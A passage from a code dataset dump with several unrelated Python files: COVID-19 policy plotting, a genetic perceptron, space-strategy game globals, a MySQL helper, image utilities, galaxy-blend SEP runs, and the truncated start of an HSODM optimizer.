edgecolor=color_add_alpha(policy_color, alphas_ec[i]),\n )\n \n \n if update_legend:\n legend_dict['lines'].append(l_pol)\n legend_dict['labels'].append('{0}% interval'.format(\n int(100*(quantiles[upper_idx]- quantiles[lower_idx]))))\n \n \n lower_idx += 1\n upper_idx -= 1\n \n \n return ax\n \ndef plot_cases(ax, this_country_cases, legend_dict, update_legend):\n if ax is None:\n fig, ax = plt.subplots()\n \n dates_cases = pd.to_datetime(this_country_cases['date'])\n cases = this_country_cases['cases'].values\n \n case_scatter = ax.scatter(dates_cases.values,cases, marker='o', color='black', s=36,clip_on=False)\n if update_legend:\n legend_dict['lines'].append(case_scatter)\n legend_dict['labels'].append('Cumulative observed cases')\n\n return ax\n\ndef plot_model(ax, this_country_model, legend_dict, update_legend):\n if ax is None:\n fig, ax = plt.subplots()\n \n dates = pd.to_datetime(this_country_model['date'])\n preds_policy = this_country_model['predicted_cum_confirmed_cases_true']\n preds_no_policy = this_country_model['predicted_cum_confirmed_cases_no_policy']\n \n l_pol = ax.plot(dates, preds_policy, color=policy_color,\n lw=3, ls='--')\n \n l_no_pol = ax.plot(dates, preds_no_policy, color=no_policy_color,\n lw=3, ls='--')\n \n if update_legend:\n legend_dict['lines'].append(l_pol)\n legend_dict['lines'].append(l_no_pol)\n \n legend_dict['labels'].append('Prediction with policy')\n legend_dict['labels'].append('Prediction no policy')\n \n return ax\n \ndef make_quantiles(this_country_df, quantiles):\n df_by_date = this_country_df.groupby('date')\n quantiles_array_policy = np.zeros((len(df_by_date.groups.keys()), len(quantiles)))\n quantiles_array_no_policy = np.zeros((len(df_by_date.groups.keys()), len(quantiles)))\n\n for d,date_idx in enumerate(df_by_date.groups.keys()):\n this_day = df_by_date.get_group(date_idx)\n \n for q,quantile in enumerate(quantiles):\n quantiles_array_policy[d,q] = np.quantile(this_day['predicted_cum_confirmed_cases_true'],\n quantile)\n quantiles_array_no_policy[d,q] = np.quantile(this_day['predicted_cum_confirmed_cases_no_policy'],\n quantile)\n \n dates = pd.to_datetime(list(df_by_date.groups.keys()))\n\n return dates, quantiles_array_policy, quantiles_array_no_policy\n\n\ndef plot_bracket(ax, model_df):\n # most recent case\n last_model_day = model_df['date'].max()\n \n start = (mdates.date2num(pd.to_datetime(last_model_day)+datetime.timedelta(days=1.5)), \n model_df.loc[model_df['date'] ==last_model_day,pred_pol_key].values[0])\n \n start_cap = (mdates.date2num(pd.to_datetime(last_model_day)+datetime.timedelta(days=1)), \n model_df.loc[model_df['date'] ==last_model_day,pred_pol_key].values[0])\n \n end = (mdates.date2num(pd.to_datetime(last_model_day)+datetime.timedelta(days=1.5)), \n model_df.loc[model_df['date'] ==last_model_day,pred_no_pol_key].values[0])\n \n end_cap = (mdates.date2num(pd.to_datetime(last_model_day)+datetime.timedelta(days=1)), \n model_df.loc[model_df['date'] ==last_model_day,pred_no_pol_key].values[0])\n\n # geometric mean is middle b/c log space\n text_spot_start = (mdates.date2num(pd.to_datetime(last_model_day)+datetime.timedelta(days=1.5)), \n np.sqrt(start[1]*end[1]))\n text_spot_end = (mdates.date2num(pd.to_datetime(last_model_day)+datetime.timedelta(days=3)), \n np.sqrt(start[1]*end[1]))\n \n \n # put line\n ax.arrow(start[0],start[1], 0, end[1] - start[1], lw=2, clip_on=False)\n # put caps\n ax.arrow(start_cap[0],start_cap[1], start[0] - start_cap[0], 0, lw=2, clip_on=False)\n ax.arrow(end_cap[0],end_cap[1], end[0] - end_cap[0], 0, lw=2, clip_on=False)\n \n # rounds to the nearest 1,000\n num_rounded = int(round(end[1]-start[1],-3))\n annot = \"{0:,d} fewer\\nestimated cases\".format(num_rounded)\n # put text\n ax.annotate(annot, xy=text_spot_start, xytext=text_spot_end, annotation_clip=False, fontsize=30,\n va='center')\n \ndef annotate_cases(ax, cases):\n # get most recent case\n lastest_cases_date = cases['date'].max()\n \n cases_last = cases[cases['date'] ==lastest_cases_date]['cases'].values[0]\n cases_date = pd.to_datetime(lastest_cases_date)\n \n cases_pos = (mdates.date2num(cases_date), cases_last)\n \n # divide for even spacing in log scale\n text_pos = (mdates.date2num(cases_date + datetime.timedelta(days=2)), cases_last/100. )\n\n formatter = mdates.DateFormatter(\"%b %d\")\n annot_date = cases_date.strftime(\"%b %d\")\n \n annot = \"{0}: {1:,d} \\nconfirmed cases\".format(annot_date, int(cases_last))\n ax.annotate(annot, xy=cases_pos, xytext=text_pos, annotation_clip=False, fontsize=30,\n va='center', arrowprops={'arrowstyle':\"->\", \n 'shrinkA':10,'shrinkB':10, \n 'connectionstyle':\"arc3,rad=0.3\",\n 'color':'black',\n 'lw':1.5})\n \n \ndef main():\n # read in all the cases data\n cases_dict = cutil.load_all_cases_deaths(cases_drop=True)\n \n # get resampled data\n resampled_dfs_by_country = {}\n for country in countries_in_order:\n print('reading ', fn_template.format(country))\n resampled_dfs_by_country[country] = pd.read_csv(fn_template.format(country))\n\n # get central estimates\n model_dfs_by_country = {}\n for country in countries_in_order:\n model_dfs_by_country[country] = pd.read_csv(fn_template.replace('bootstrap','model').format(country))\n\n\n # get quantile data\n quantiles = [0.025, # 95% range\n 0.15, # 70% range\n 0.85, \n 0.975]\n\n quantiles_by_country = {}\n for country in countries_in_order:\n quantile_this_country = {}\n dates, quantiles_policy, quantiles_no_policy = make_quantiles(resampled_dfs_by_country[country], quantiles)\n\n quantile_this_country['dates'] = dates\n quantile_this_country['quantiles_policy'] = quantiles_policy\n quantile_this_country['quantiles_no_policy'] = quantiles_no_policy\n quantiles_by_country[country] = quantile_this_country\n \n \n # plot \n fig, ax = plt.subplots(len(countries_in_order), figsize=(15,7*len(countries_in_order)),\n sharex=True, \n sharey=True\n )\n\n legend_dict = {'lines':[], 'labels':[]}\n \n for c, country in enumerate(countries_in_order):\n # 1.a plot quantiles and model\n quantiles_this_country = quantiles_by_country[country]\n model_this_country = model_dfs_by_country[country]\n\n ax[c] = plot_quantiles(ax[c], quantiles, quantiles_this_country, legend_dict,\n model=model_this_country,\n update_legend = (c==0))\n\n\n # 1.b annotate the model on the right\n plot_bracket(ax[c], model_this_country)\n\n # 2.a plot cases where they overlap with predictions\n cases_this_country = cases_dict[country]\n cases_overlap_preds_mask = cases_this_country['date_str'].apply(lambda x: \n x in model_this_country['date'].values)\n cases_overlapping_predictions = cases_this_country.where(cases_overlap_preds_mask)\n ax[c] = plot_cases(ax[c],cases_overlapping_predictions, legend_dict, update_legend = (c==0))\n \n # 2.b annotate cases\n annotate_cases(ax[c], cases_overlapping_predictions)\n\n\n # 3. set title and axis labels\n ax[c].set_title(country_names[country],fontsize=44, verticalalignment='baseline', loc='center')\n \n ax[c].set_ylabel('Predicted cumulative \\ncases',fontsize=32)\n ax[c].set_yscale('log')\n \n ax[c].set_xlim(np.datetime64('2020-01-15'),np.datetime64('2020-03-18'))\n \n ax[c].set_ylim(10,1e8)\n\n # dates on x axis\n days_all = mdates.DayLocator(interval=1) \n days_sparse = mdates.DayLocator(interval=10) \n formatter = mdates.DateFormatter(\"%b %d\")\n\n ax[c].xaxis.set_major_formatter(formatter)\n ax[c].xaxis.set_minor_locator(days_all)\n ax[c].xaxis.set_major_locator(days_sparse)\n\n # set to mostly match fig 3\n ax[c].tick_params(axis='x', which='major', labelsize=28, length=10, width=4)\n ax[c].tick_params(axis='x', which='minor', length=5, width=1.5)\n ax[c].tick_params(axis='y', which='major', labelsize=26, length=8, width=1)\n \n ax[c].tick_params(axis='y', which='minor', labelsize=26, length=5, width=.1)\n ax[c].set_yticks(ax[c].get_yticks(minor=True)[::5],minor=True);\n ax[c].set_yticks(np.logspace(1,8,base=10,num=8));\n \n sns.despine(ax=ax[c],top=True)\n sns.despine(ax=ax[c],top=True)\n\n # thicken the axes\n plt.setp(ax[c].spines.values(), linewidth=2)\n ax[c].grid(lw=1)\n \n\n # add a legend axis\n leg_ax = fig.add_axes([1.0, 0.6, 0.2, 0.2])\n\n leg = leg_ax.legend(handles=legend_dict['lines'],\n labels=legend_dict['labels'],\n loc=(0.42,0.82),\n fontsize=32,\n title=\"Legend\", \n frameon=False,\n markerscale=3)\n \n leg._legend_box.align = \"left\"\n plt.setp(leg.get_title(),fontsize=44)\n\n leg_ax.axis('off')\n\n if save_fig:\n out_fn = fig_dir / fig_name\n print(\"saving fig in {0}\".format(out_fn))\n plt.savefig(out_fn,bbox_inches='tight',bbox_extra_artists=(leg,))\n \nif __name__ == '__main__':\n main()\n \n","sub_path":"codes/plotting/gen_fig4.py","file_name":"gen_fig4.py","file_ext":"py","file_size_in_byte":13951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"219033463","text":"import evolution as evo\n\nclass GeneticPerceptronParams(evo.EvolutionParamsInterface):\n\n def __init__(self, data, labels, thresh, pop_size):\n\n gen_params = {\n \"len\" : len(data[0]) + 1\n }\n \n sel_params = {\n 'k' : 5,\n 'w' : [1, 1, 1, 1, 1],\n \"tourn_size\" : pop_size // 5\n }\n\n sco_params = {\n \"data\" : data,\n \"labels\" : labels\n }\n\n cro_params = {\n 'w' : [1, 1]\n }\n\n mut_params = {\n \"mut_fns\" : [evo.Mutation.real_vector_gaussian,\n evo.Mutation.real_vector_negate,\n evo.Mutation.real_vector_random_negate],\n \"mut_params\" : { \"mean\" : 0, \"var\" : 1, \"num_to_negate\" : 1}\n }\n\n super().__init__(gen_params, sel_params, sco_params,\n cro_params, mut_params, thresh, pop_size)\n\n def gen_fn(self, params):\n return evo.Generation.random_gaussian_vector(params)\n\n def sel_fn(self, population, pop_size, sco_fn, scoring_params, params):\n return evo.Selection.tournament(population, pop_size,\n sco_fn, scoring_params,\n params)\n\n def sco_fn(self, individual, params):\n data = params[\"data\"]\n labels = params[\"labels\"]\n\n data_len = len(data)\n\n bias = individual[0]\n weights = individual[1:]\n correctly_classified = 0\n for datum, i in zip(data, range(0, data_len)):\n weighted_sum = bias\n for weight, value in zip(weights, datum):\n weighted_sum += weight * value\n if weighted_sum > 0:\n classification = 1\n else:\n classification = 0\n if classification == labels[i]:\n correctly_classified += 1\n return correctly_classified / data_len\n \n def cro_fn(self, i1, i2, params):\n return evo.Crossover.uniform(i1, i2, params)\n\n def mutator(self, individual, params):\n return evo.Mutator.equal_choice(individual, params)\n\nif __name__ == \"__main__\":\n\n path_to_data = \"Data/\"\n \n tr_data_file = input(\"Training Data file: \")\n tr_data_file = open(path_to_data + tr_data_file)\n tr_data = list(map(lambda d: d.strip().split(','), tr_data_file.readlines()))\n tr_data_file.close()\n\n te_data_file = input(\"Testing Data file: \")\n te_data_file = open(path_to_data + te_data_file)\n te_data = list(map(lambda d: d.strip().split(','), te_data_file.readlines()))\n te_data_file.close()\n\n label_to_classify = 8\n\n tr_labels = []\n for datum, i in zip(tr_data, range(0, len(tr_data))):\n int_datum = list(map(lambda v: int(v), datum))\n tr_data[i] = int_datum[1:]\n tr_labels.append(1 if int_datum[0] == label_to_classify else 0)\n\n te_labels = []\n for datum, i in zip(te_data, range(0, len(te_data))):\n int_datum = list(map(lambda v: int(v), datum))\n te_data[i] = int_datum[1:]\n te_labels.append(1 if int_datum[0] == label_to_classify else 0)\n\n thresh = 1.00\n pop_size = 50\n\n evo_params = GeneticPerceptronParams(tr_data, tr_labels, thresh, pop_size)\n\n ended = False\n\n while not ended:\n weights, score = evo.evolution_driver(evo_params, True, 1)\n\n testing_params = {\n \"data\" : te_data,\n \"labels\" : te_labels\n }\n\n print(\"\\nTesting weights... \", end='')\n testing_score = evo_params.sco_fn(weights, testing_params)\n print(\"Done\")\n\n print(\"\\nTesting score: {!s}\".format(testing_score))\n\n ended = input(\"\\nContinue? (y/n): \").lower() not in ['yes', 'y']\n","sub_path":"Genetic Algorithms/Python GA/genetic_perceptron.py","file_name":"genetic_perceptron.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"215814665","text":"\"\"\"\nModule to contain globals. \nSince only one game can be played at once a singleton seems appropriate.\n\"\"\"\nimport logging\nimport pygame\n\nfrom galaxy import Galaxy\nimport ship\nimport faction\nfrom model import event_log\n\nfactions = []\nships = {}\ngalaxy = Galaxy()\nturn_count = 1\ngame_mode = None\n\ndef check_elimination():\n accumulators = {}\n for faction in factions:\n accumulators[faction] = 0\n for world in galaxy.planets.values():\n if world.owner != None:\n accumulators[world.owner] += 1\n for faction in accumulators.keys():\n if accumulators[faction] < 1: # Eliminate factions with no worlds.\n faction.eliminate() \n\n# Generation parameters.\ngalaxy_size = (50,50)\nworld_density = float(1)/25\ngeneration_seed = None\nnumber_of_initial_factions = 2 \n\ndef set_galaxy_size(size):\n \"\"\"Set the size of the game's galaxy.\"\"\"\n global galaxy_size\n galaxy_size = size\ndef set_world_density(density):\n \"\"\"Set the world generation density.\"\"\"\n global world_density\n world_density = density\ndef set_galaxy_seed(seed):\n \"\"\"Generate a particular galaxy.\"\"\"\n global generation_seed\n generation_seed = seed \ndef set_number_of_factions(num):\n \"\"\"Set the number of player-character factions.\"\"\"\n global number_of_initial_factions\n number_of_initial_factions = num\n \ndef init():\n global galaxy, factions, ships, turn_count\n global galaxy_size, world_density, generation_seed\n global number_of_initial_factions\n factions = []\n ships = {}\n (w,h) = galaxy_size\n galaxy = Galaxy(w,h, world_density, generation_seed)\n turn_count = 1\n # faction.PLAYERFACTION = factions[0]\n \n for _ in range(number_of_initial_factions):\n galaxy.add_player()\n \n for y in range(galaxy.height):\n for x in range(galaxy.width):\n ships[x,y] = []\n \n event_log.reset()\n\nlog = logging.getLogger(__name__)\n\ndef _do_end_of_turn():\n \"\"\"End of turn processing.\"\"\"\n global turn_count, ships\n log.debug(\"End of turn \"+str(turn_count)+\".\")\n turn_count += 1\n \n event_log.reset()\n \n for faction in factions:\n faction.tick()\n for planet in galaxy.planets.values():\n planet.tick()\n ships = ship.process_ship_turn(ships)\n \n # Blockades\n for planet in galaxy.planets.values():\n for a in ships[planet.position]:\n if a.faction != planet.owner and a.attack >0 and planet.owner != None:\n # This planet is blockaded\n if planet.blockaded == False:\n event_log.add(event_log.Event(planet.name+str(\" blockaded\"),\n planet.position,a.faction))\n planet.blockaded = True\n \n \n check_elimination()\n \n if len(factions) < 2:\n event = pygame.event.Event(pygame.USEREVENT,action=\"End of Game\")\n pygame.event.post(event)\n \n event = pygame.event.Event(pygame.USEREVENT, action=\"End of Turn\")\n pygame.event.post(event)\n \n\n\ndef end_of_turn(faction):\n \"\"\"\n Mark a given faction's turn as complete.\n When all factions are marked as complete process the turn and resume.\n \"\"\"\n \n ship.sensor_map_dirty = True\n \n faction.ready = True\n log.debug(faction.name+\" marked ready.\")\n \n def check():\n for faction in factions:\n if faction.ready == False:\n return False\n return True\n \n if check():\n _do_end_of_turn()\n for faction in factions:\n faction.ready = False\n return\n \n","sub_path":"duelfieldstars/model/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"642726351","text":"import pymysql\n\n\nclass DBUtil:\n def __init__(self):\n self.conn = pymysql.connect(host=\"localhost\", port=3306, db=\"wxy\", user=\"root\", passwd=\"root\")\n\n def update(self, sql, values):\n cur = self.conn.cursor()\n try:\n cur.execute(sql, values)\n self.conn.commit()\n return True\n except:\n return False\n finally:\n cur.close()\n\n def query(self, sql, values):\n cur = self.conn.cursor(cursor=pymysql.cursors.DictCursor)\n try:\n cur.execute(sql, values)\n return cur.fetchall()\n except:\n return None\n finally:\n cur.close()\n\n def close(self):\n self.conn.close()\n","sub_path":"dbutil.py","file_name":"dbutil.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"84307911","text":"import sys,os,pickle,uuid,cv2,glob,csv\nimport matplotlib.pyplot as plt\nimport os.path as osp\nimport numpy as np\nimport numpy.random as npr\nfrom core.config import cfg,iconicImagesFileFormat\nfrom utils.base import scaleImage\n\ndef cropImageToAnnoRegion(im_orig,box):\n x1 = box[0]\n y1 = box[1]\n x2 = box[2]\n y2 = box[3]\n return scaleCroppedImage(im_orig[y1:y2, x1:x2])\n\ndef scaleCroppedImage(im_orig):\n return scaleImage(im_orig,cfg.CROPPED_IMAGE_SIZE)\n\ndef scaleRawImage(im_orig):\n return scaleImage(im_orig,cfg.RAW_IMAGE_SIZE)\n\ndef addImgBorder(img,border=255):\n img[0,:,:] = border\n img[-1,:,:] = border\n img[:,0,:] = border\n img[:,-1,:] = border\n\ndef getImageWithBorder(_img,border=255,rotation=None):\n img = _img.copy()\n if cfg._DEBUG.utils.misc: print(\"[save_image_with_border] rotation\",rotation)\n if rotation:\n angle,cols,rows = rotation[0],rotation[1],rotation[2]\n rotationMat,scale = getRotationInfo(angle,cols,rows)\n if cfg._DEBUG.utils.misc: print(\"[utils/misc.py] rotationMat\",rotationMat)\n img_blank = np.zeros(img.shape,dtype=np.uint8)\n addImgBorder(img_blank,border=border)\n if cfg._DEBUG.utils.misc: print(img_blank.shape)\n img_blank = cv2.warpAffine(img_blank,rotationMat,(cols,rows),scale)\n img += img_blank\n addImgBorder(img,border=border)\n return img\n\ndef save_image_with_border(fn,_img,border=255,rotation=None):\n img = getImageWithBorder(_img,border=border,rotation=rotation)\n fp = osp.join(cfg.ROTATE_PATH,fn)\n cv2.imwrite(fp,img)\n\ndef concatenate_images(image1,image2,average_size=False,axis=1):\n # make the input larger along the width\n # axis = 0 or 1\n if average_size:\n # align image size on both dims\n average_shape = np.mean([image1.shape, image2.shape],axis=0,dtype=np.int)\n scaled_image1 = scaleImage(image1,average_shape)\n scaled_image2 = scaleImage(image2,average_shape)\n else:\n # align image size on \"axis\" dim\n average_shape = np.mean([image1.shape, image2.shape],axis=0,dtype=np.int)\n not_axis = np.abs(axis-1)\n shape1 = [average_shape[axis],average_shape[axis]]\n shape2 = [average_shape[axis],average_shape[axis]]\n shape1[not_axis] = image1.shape[not_axis]\n shape2[not_axis] = image2.shape[not_axis]\n scaled_image1 = scaleImage(image1,shape1)\n scaled_image2 = scaleImage(image2,shape2)\n concat_image = np.concatenate((scaled_image1,scaled_image2),axis=axis)\n # print(\"concat_image.shape\",concat_image.shape)\n return concat_image\n\ndef splitImageForSiameseNet(img,axis=1,location=\"middle\"):\n if location == \"middle\":\n if axis == 1:\n half_index = img.shape[1]//2\n img1 = img[:,:half_index,:]\n img2 = img[:,half_index:,:]\n return [img1,img2]\n else:\n print(\"[image_utils.py splitImageForSiameseNet]: can't handle axis {}\".format(axis))\n exit()\n else:\n print(\"[image_utils.py splitImageForSiameseNet]: unknown split location {}\".format(location))\n exit()\n\ndef save_image_list_to_file(image_list,append_str_l,vis=False,size=cfg.CROPPED_IMAGE_SIZE,infix=None):\n print(\"[./utils/image_utils.py: save_image_list_to_file]: saving images\")\n useAppendStr = append_str_l is not None and len(append_str_l) == len(image_list)\n prev_img = image_list[0]\n for idx,img in enumerate(image_list):\n # print(img.max(),img.min())\n # print(img.shape)\n if img.max() <= 1: # rescaleImageValues\n img[:,:,:] *= 255\n #img[:size,:size,:] += cfg.PIXEL_MEANS\n img = img.astype(np.uint8)\n if idx >= 1:\n print(prev_img[15:17,15:17])\n print(img[15:17,15:17])\n print(np.all(prev_img == img))\n prev_img = img\n fn = \"save_image_list_image\"\n if infix:\n fn += \"_{}\".format(infix)\n if useAppendStr:\n fn += \"{}_{}.png\".format(idx,append_str_l[idx])\n else:\n fn += \"{}.png\".format(idx)\n\n print(fn)\n if vis is False:\n cv2.imwrite(fn,img)\n else:\n plt.imshow(img[:,:,::-1])\n plt.show()\n\n","sub_path":"lib/utils/image_utils.py","file_name":"image_utils.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"597903930","text":"###### Running SExtractor on simulated galsim images\n\n## Import script for SExtractor\n#Script written by A. Guinot : https://github.com/aguinot\n\nimport numpy as np\nfrom sep_script import Run_Sep\n\n#SEP params\nBIG_DISTANCE = 1e30\nNO_BLEND = 0\nBLEND = 1\nMISS_EXTRACTION = 16\n\n#Path to images\ntestpath = '/Users/lacan/Cosmostat/Codes/BlendHunter'\n\ndef extract_test_images(path):\n img = np.load(path, allow_pickle=True)\n test_img = img[36000:40000]\n return test_img\n\n\n# Run sep function\ndef sep_results(blends=None,no_blends=None, sigma_val=None,path=None):\n runner = Run_Sep()\n flags_b, sep_res_b = runner.process(blends)\n flags_nb, sep_res_nb = runner.process(no_blends)\n\n #Display results\n acc = (len(np.where(flags_b == 1)[0])+len(np.where(flags_nb == 0)[0]))/(len(flags_b)+len(flags_nb))\n\n #concatenate flags\n flags = np.concatenate((flags_b, flags_nb), axis =0)\n sep_res = np.concatenate((sep_res_b, sep_res_nb), axis =0)\n\n #save (create 'sep_results_8000' folder)\n np.save(path+'/sep_results_8000/flags{}.npy'.format(sigma_val), flags)\n np.save(path+'/sep_results_8000/sep_res{}.npy'.format(sigma_val), sep_res)\n print('Sep Accuracy (sigma{}): {}%'.format(sigma_val, acc*100))\n n_miss = (len(np.where(flags_b == 16)[0])+len(np.where(flags_nb == 16)[0]))/(len(flags_b)+len(flags_nb))\n print('Misidentified : {}%'.format(n_miss*100))\n\n return flags\n\nsigmas = np.array([[5,51,52 ,53, 54], [14,141,142,143,144], [18,181,182,183,184],\n [26,261,262,263,264], [35,351,352,353,354], [40,401,402,403,404]])\n\n'''1. $\\sigma_{noise} = 5$'''\n################## #######################################################\npaths5 = np.array([[testpath+'/images_noisy/blended_noisy{}.npy'.format(i) for i in sigmas[0]],\n [testpath+'/images_noisy/not_blended_noisy{}.npy'.format(i) for i in sigmas[0]]])\n#Getting the images\nblended_5 = [extract_test_images(paths5[0][j]) for j in range(5)]\nnot_blended_5 = [extract_test_images(paths5[1][j]) for j in range(5)]\n\n####Run sep\nfor i,j in zip(range(5), sigmas[0]):\n sep_results(blends=blended_5[i], no_blends = not_blended_5[i], sigma_val=j, path=testpath)\n\n'''2. $\\sigma_{noise} = 14$'''\n###################################################################\npaths14 = np.array([[testpath+'/images_noisy/blended_noisy{}.npy'.format(i) for i in sigmas[1]],\n [testpath+'/images_noisy/not_blended_noisy{}.npy'.format(i) for i in sigmas[1]]])\n#Getting the images\nblended_14 = [extract_test_images(paths14[0][j]) for j in range(5)]\nnot_blended_14 = [extract_test_images(paths14[1][j]) for j in range(5)]\n\n####Run sep\nfor i,j in zip(range(5), sigmas[1]):\n sep_results(blends=blended_14[i], no_blends = not_blended_14[i], sigma_val=j, path=testpath)\n\n'''3. $\\sigma_{noise} = 18$'''\n#####################################################################\npaths18 = np.array([[testpath+'/images_noisy/blended_noisy{}.npy'.format(i) for i in sigmas[2]],\n [testpath+'/images_noisy/not_blended_noisy{}.npy'.format(i) for i in sigmas[2]]])\n#Getting the images\nblended_18 = [extract_test_images(paths18[0][j]) for j in range(5)]\nnot_blended_18 = [extract_test_images(paths18[1][j]) for j in range(5)]\n\n####Run sep\nfor i,j in zip(range(5), sigmas[2]):\n sep_results(blends=blended_18[i], no_blends = not_blended_18[i], sigma_val=j, path=testpath)\n\n'''4. $\\sigma_{noise} = 26$'''\n####################################################################\npaths26 = np.array([[testpath+'/images_noisy/blended_noisy{}.npy'.format(i) for i in sigmas[3]],\n [testpath+'/images_noisy/not_blended_noisy{}.npy'.format(i) for i in sigmas[3]]])\n#Getting the images\nblended_26 = [extract_test_images(paths26[0][j]) for j in range(5)]\nnot_blended_26 = [extract_test_images(paths26[1][j]) for j in range(5)]\n\n####Run sep\nfor i,j in zip(range(5), sigmas[3]):\n sep_results(blends=blended_26[i], no_blends = not_blended_26[i], sigma_val=j, path=testpath)\n\n'''4. $\\sigma_{noise} = 26$'''\n######################################################################\npaths35 = np.array([[testpath+'/images_noisy/blended_noisy{}.npy'.format(i) for i in sigmas[4]],\n [testpath+'/images_noisy/not_blended_noisy{}.npy'.format(i) for i in sigmas[4]]])\n#Getting the images\nblended_35 = [extract_test_images(paths35[0][j]) for j in range(5)]\nnot_blended_35 = [extract_test_images(paths35[1][j]) for j in range(5)]\n\n####Run sep\nfor i,j in zip(range(5), sigmas[4]):\n sep_results(blends=blended_35[i], no_blends = not_blended_35[i], sigma_val=j, path=testpath)\n\n'''6. $\\sigma_{noise} = 40$'''\n#####################################################################\npaths40 = np.array([[testpath+'/images_noisy/blended_noisy{}.npy'.format(i) for i in sigmas[5]],\n [testpath+'/images_noisy/not_blended_noisy{}.npy'.format(i) for i in sigmas[5]]])\n#Getting the images\nblended_40 = [extract_test_images(paths40[0][j]) for j in range(5)]\nnot_blended_40 = [extract_test_images(paths40[1][j]) for j in range(5)]\n\n####Run sep\nfor i,j in zip(range(5), sigmas[5]):\n sep_results(blends=blended_40[i], no_blends = not_blended_40[i], sigma_val=j, path=testpath)\n\n'''REAL IMAGES '''\n####################################################################\npath_real = ['/Users/lacan/Cosmostat/Codes/BlendHunter/bh_real/blended_noisy.npy',\n '/Users/lacan/Cosmostat/Codes/BlendHunter/bh_real/not_blended_noisy.npy']\n\n#Getting the images blended and not blended\nblended_real = extract_test_images(path_real[0])\nnot_blended_real = extract_test_images(path_real[1])\n\n#Run sep\nsep_results(blends=blended_real, no_blends = not_blended_real, sigma_val='real', path=testpath)\n\n'''Padded images '''\n####################################################################\npath_pad5 = ['/Users/lacan/Cosmostat/Codes/BlendHunter/bh_pad5/blended_noisy.npy',\n '/Users/lacan/Cosmostat/Codes/BlendHunter/bh_pad5/not_blended_noisy.npy']\n\n#Getting the images blended and not blended\nblended_pad5 = extract_test_images(path_pad5[0])\nnot_blended_pad5 = extract_test_images(path_pad5[1])\n\n#Run sep\nrunner_pad5 = Run_Sep()\nflags_b_pad5, sep_res_b_pad5 = runner5.process(blended_pad5)\nflags_nb_pad5, sep_res_nb_pad5 = runner5.process(not_blended_pad5)\n\n#Display results\nacc_pad5= (len(np.where(flags_b_pad5 == 1)[0])+len(np.where(flags_nb_pad5 == 0)[0]))/(len(flags_b_pad5)+len(flags_nb_pad5))\nprint('Sep Accuracy (pad_35) : {}%'.format(acc_pad5*100))\n\n\n\n'''Mixed noise in dataset '''\n####################################################################\npath_mn = ['/Users/lacan/Cosmostat/Codes/BlendHunter/bh_mix_close/blended_noisy.npy',\n '/Users/lacan/Cosmostat/Codes/BlendHunter/bh_mix_close/not_blended_noisy.npy']\n\n#Getting the images blended and not blended\nblended_mn = extract_test_images(path_mn[0])\nnot_blended_mn = extract_test_images(path_mn[1])\n\n#Run sep\nrunner_mn = Run_Sep()\nflags_b_mn, sep_res_b_mn = runner_mn.process(blended_mn)\nflags_nb_mn, sep_res_nb_mn = runner_mn.process(not_blended_mn)\n\n#Display results\nacc_mn = (len(np.where(flags_b_mn == 1)[0])+len(np.where(flags_nb_mn == 0)[0]))/(len(flags_b_mn)+len(flags_nb_mn))\nprint('Sep Accuracy (mixed noise) : {}%'.format(acc_mn*100))\n","sub_path":"sextractor/run_sextractor.py","file_name":"run_sextractor.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"475762307","text":"from math import sqrt, ceil, log, isnan\nfrom datetime import datetime\nfrom scipy.sparse.linalg import LinearOperator\nfrom scipy.sparse.linalg import eigsh\nimport numpy as np\n\ndef HSODM(w, loss, gradient, Hv=None, hessian=None, X=None, Y=None, opt=None,**kwargs):\n\n\n print ('--- HSODM ---\\n')\n\n if X is None:\n n=1\n d=1\n else:\n n = X.shape[0]\n d = X.shape[1]\n\n grad_tol = opt.get('grad_tol', 1e-6)\n n_iterations = opt.get('n_iterations', 20)\n\n\n # Sampling\n Hessian_sampling_flag = opt.get('Hessian_sampling', False)\n gradient_sampling_flag = opt.get('gradient_sampling', False)\n\n if gradient_sampling_flag == True or Hessian_sampling_flag == True:\n assert (X is not None and Y is not None), \"Subsampling is only possible if data is passsed, i.e. X and Y may not be none\"\n\n initial_sample_size_Hessian = opt.get('initial_sample_size_Hessian', 0.05)\n initial_sample_size_gradient = opt.get('initial_sample_size_gradient', 0.05)\n sample_scaling_Hessian = opt.get('sample_scaling_Hessian', 1)\n sample_scaling_gradient = opt.get('sample_scaling_gradient', 1)\n unsuccessful_sample_scaling = opt.get('unsuccessful_sample_scaling', 1.25)\n sampling_scheme = opt.get('sampling_scheme', 'linear')\n if Hessian_sampling_flag == False and gradient_sampling_flag == False:\n sampling_scheme = None\n\n print(\"- Hessian_sampling:\", Hessian_sampling_flag)\n print(\"- Gradient_sampling:\", gradient_sampling_flag)\n print(\"- Sampling_scheme:\", sampling_scheme, \"\\n\")\n\n ### -> no opt call after here!!\n k = 0\n n_samples_seen = 0\n\n loss_collector = []\n timings_collector = []\n samples_collector = []\n\n _loss = loss(w, X, Y, **kwargs)\n loss_collector.append(_loss)\n timings_collector.append(0)\n samples_collector.append(0)\n\n start = datetime.now()\n timing = 0\n\n if sampling_scheme == 'exponential':\n exp_growth_constant = ((1 - initial_sample_size_Hessian) * n) ** (1 / n_iterations)\n\n for i in range(n_iterations):\n\n grad = gradient(w, X, Y, **kwargs)\n grad_norm = np.linalg.norm(grad)\n\n ## a) determine batchsize ##\n if sampling_scheme == 'exponential':\n sample_size_Hessian = Hessian_sampling_flag * (\n int(min(n, n * initial_sample_size_Hessian + exp_growth_constant ** (i + 1))) + 1) + (\n 1 - Hessian_sampling_flag) * n\n sample_size_gradient = gradient_sampling_flag * (\n int(min(n, n * initial_sample_size_gradient + exp_growth_constant ** (i + 1))) + 1) + (\n 1 - gradient_sampling_flag) * n\n\n elif sampling_scheme == 'linear':\n sample_size_Hessian = Hessian_sampling_flag * int(\n min(n, max(n * initial_sample_size_Hessian, n / n_iterations * 